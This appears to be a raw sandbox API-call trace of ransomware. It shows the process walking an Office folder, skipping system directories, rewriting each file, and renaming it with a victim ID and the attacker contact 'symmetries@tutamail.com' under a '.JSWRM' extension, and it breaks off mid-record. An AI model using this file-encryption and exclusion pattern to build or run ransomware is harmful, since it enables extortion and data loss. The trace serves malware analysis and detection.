[0121.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STSLIST.CHM", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0121.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STSLIST.CHM", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STSLIST.CHM", lpUsedDefaultChar=0x0) returned 11 [0121.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0121.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0121.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STSLIST.CHM", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0121.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STSLIST.CHM", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STSLIST.CHM", lpUsedDefaultChar=0x0) returned 11 [0121.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0121.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0121.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0121.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0121.435] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\STSLIST.CHM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\stslist.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.436] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=433434) returned 1 [0121.436] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1d8 [0121.437] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0121.457] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.457] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0121.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.457] CloseHandle (hObject=0x238) returned 1 [0121.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0121.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0121.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0121.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0121.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0121.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0121.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0121.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0121.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.458] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\STSLIST.CHM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\stslist.chm"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\STSLIST.CHM.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\stslist.chm.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0121.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0121.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0121.459] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf472b09c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf472b09c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf472b09c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x160d8, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="STSLISTI.DLL", cAlternateFileName="")) returned 1 [0121.462] lstrcmpiW (lpString1="STSLISTI.DLL", lpString2=".") returned 1 [0121.462] lstrcmpiW (lpString1="STSLISTI.DLL", lpString2="..") returned 1 [0121.462] lstrcmpiW (lpString1="STSLISTI.DLL", lpString2="...") returned 1 [0121.462] lstrcmpiW (lpString1="STSLISTI.DLL", lpString2="windows") returned -1 [0121.462] lstrcmpiW (lpString1="STSLISTI.DLL", lpString2="recovery") returned 1 [0121.462] lstrcmpiW (lpString1="STSLISTI.DLL", lpString2="perflogs") returned 1 [0121.462] lstrcmpiW (lpString1="STSLISTI.DLL", lpString2="documents and settings") returned 1 [0121.462] lstrcmpiW (lpString1="STSLISTI.DLL", lpString2="$RECYCLE.BIN") returned 1 [0121.462] lstrcmpiW (lpString1="STSLISTI.DLL", lpString2="system volume information") returned -1 [0121.462] lstrcmpiW (lpString1="STSLISTI.DLL", lpString2="msocache") returned 1 [0121.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0121.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STSLISTI.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0121.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STSLISTI.DLL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STSLISTI.DLL", lpUsedDefaultChar=0x0) returned 12 [0121.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0121.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0121.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STSLISTI.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0121.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STSLISTI.DLL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STSLISTI.DLL", lpUsedDefaultChar=0x0) returned 12 [0121.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0121.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0121.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0121.463] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4796e84, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4796e84, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4796e84, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd7a, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SUNNY.CSS", cAlternateFileName="")) returned 1 [0121.463] lstrcmpiW (lpString1="SUNNY.CSS", lpString2=".") returned 1 [0121.463] lstrcmpiW (lpString1="SUNNY.CSS", lpString2="..") returned 1 [0121.463] lstrcmpiW (lpString1="SUNNY.CSS", lpString2="...") returned 1 [0121.463] lstrcmpiW (lpString1="SUNNY.CSS", lpString2="windows") returned -1 [0121.463] lstrcmpiW (lpString1="SUNNY.CSS", lpString2="recovery") returned 1 [0121.463] lstrcmpiW (lpString1="SUNNY.CSS", lpString2="perflogs") returned 1 [0121.463] lstrcmpiW (lpString1="SUNNY.CSS", lpString2="documents and settings") returned 1 [0121.463] lstrcmpiW (lpString1="SUNNY.CSS", lpString2="$RECYCLE.BIN") returned 1 [0121.463] lstrcmpiW (lpString1="SUNNY.CSS", lpString2="system volume information") returned -1 [0121.463] lstrcmpiW (lpString1="SUNNY.CSS", lpString2="msocache") returned 1 [0121.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0121.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SUNNY.CSS", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0121.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SUNNY.CSS", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SUNNY.CSS", lpUsedDefaultChar=0x0) returned 9 [0121.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0121.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0121.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SUNNY.CSS", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0121.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SUNNY.CSS", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SUNNY.CSS", lpUsedDefaultChar=0x0) returned 9 [0121.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0121.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0121.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0121.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0121.463] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SUNNY.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\sunny.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.464] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3450) returned 1 [0121.464] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd70) returned 0x206858 [0121.464] ReadFile (in: hFile=0x238, lpBuffer=0x206858, nNumberOfBytesToRead=0xd70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xd70, lpOverlapped=0x0) returned 1 [0121.466] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.466] WriteFile (in: hFile=0x238, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xd70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xd70, lpOverlapped=0x0) returned 1 [0121.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0121.466] CloseHandle (hObject=0x238) returned 1 [0121.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0121.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0121.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0121.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0121.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0121.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0121.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.467] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SUNNY.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\sunny.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SUNNY.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\sunny.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0121.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0121.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0121.468] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4796e84, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4796e84, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4796e84, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd7a, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SUNSET.CSS", cAlternateFileName="")) returned 1 [0121.468] lstrcmpiW (lpString1="SUNSET.CSS", lpString2=".") returned 1 [0121.468] lstrcmpiW (lpString1="SUNSET.CSS", lpString2="..") returned 1 [0121.468] lstrcmpiW (lpString1="SUNSET.CSS", lpString2="...") returned 1 [0121.468] lstrcmpiW (lpString1="SUNSET.CSS", lpString2="windows") returned -1 [0121.468] lstrcmpiW (lpString1="SUNSET.CSS", lpString2="recovery") returned 1 [0121.468] lstrcmpiW (lpString1="SUNSET.CSS", lpString2="perflogs") returned 1 [0121.468] lstrcmpiW (lpString1="SUNSET.CSS", lpString2="documents and settings") returned 1 [0121.468] lstrcmpiW (lpString1="SUNSET.CSS", lpString2="$RECYCLE.BIN") returned 1 [0121.468] lstrcmpiW (lpString1="SUNSET.CSS", lpString2="system volume information") returned -1 [0121.468] lstrcmpiW (lpString1="SUNSET.CSS", lpString2="msocache") returned 1 [0121.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0121.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SUNSET.CSS", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0121.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SUNSET.CSS", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SUNSET.CSS", lpUsedDefaultChar=0x0) returned 10 [0121.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0121.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0121.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SUNSET.CSS", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0121.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SUNSET.CSS", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SUNSET.CSS", lpUsedDefaultChar=0x0) returned 10 [0121.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0121.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0121.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0121.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0121.468] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SUNSET.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\sunset.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.469] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3450) returned 1 [0121.469] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd70) returned 0x206858 [0121.469] ReadFile (in: hFile=0x238, lpBuffer=0x206858, nNumberOfBytesToRead=0xd70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xd70, lpOverlapped=0x0) returned 1 [0121.471] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.471] WriteFile (in: hFile=0x238, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xd70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xd70, lpOverlapped=0x0) returned 1 [0121.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0121.471] CloseHandle (hObject=0x238) returned 1 [0121.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0121.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0121.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0121.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0121.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0121.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0121.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0121.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0121.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.472] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SUNSET.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\sunset.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SUNSET.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\sunset.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0121.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0121.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0121.473] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaee2894, ftCreationTime.dwHighDateTime=0x1d327e8, 